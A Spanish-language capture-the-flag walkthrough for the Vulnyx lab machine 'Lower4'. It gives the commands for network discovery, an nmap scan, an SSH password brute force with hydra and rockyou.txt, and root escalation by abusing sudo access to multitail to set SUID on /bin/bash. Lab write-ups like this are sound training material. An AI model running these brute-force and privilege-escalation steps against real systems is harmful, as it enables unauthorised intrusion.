Máquina Lower4 (Vulnyx)
Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Victima: 10.0.2.32
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:
$ ping -c 1 10.0.2.32
Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux.
A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:
$ nmap -Pn 10.0.2.32 -sVC
Investigando sobre el servicio ident (113), vemos que es un protocolo que se utiliza a través de internet para asociar una conexión TCP con un usuario especifico, por lo tanto ya tenemos el usuario lucifer.
Con la herramienta hydra realizamos un ataque a ssh para intentar crackear la contraseña del usuario lucifer, para ello ejecutamos el siguiente comando:
$ hydra -l lucifer -P ./Descargas/rockyou.txt ssh://10.0.2.32 -T 64
Y obtenemos la contraseña 789456123.
A continuación, nos conectamos por ssh, para ello ejecutamos el siguiente comando:
$ ssh lucifer@10.0.2.32
Introducimos la contraseña obtenida anteriormente.
¡¡¡Somos lucifer!!!.
$ sudo -l
Nos encontramos con el binario multitail que lo podemos ejecutar como el usuario root, revisando la ayuda de este binario encontramos que con el parámetro -l nos permite ejecutar comandos, por lo tanto, le asignamos el permiso SUID al binario bash, para ello ejecutamos el siguiente comando:
$ sudo -u root /usr/bin/multitail -l "chmod u+s /bin/bash"
Ejecutamos el binario bash con la opción -pi para que preserve los privilegios efectivos y una shell interactiva, para ello ejecutamos el siguiente comando:
$ /bin/bash -pi
¡¡¡Ya somos root!!!
Ya podemos leer las flags de user y root.




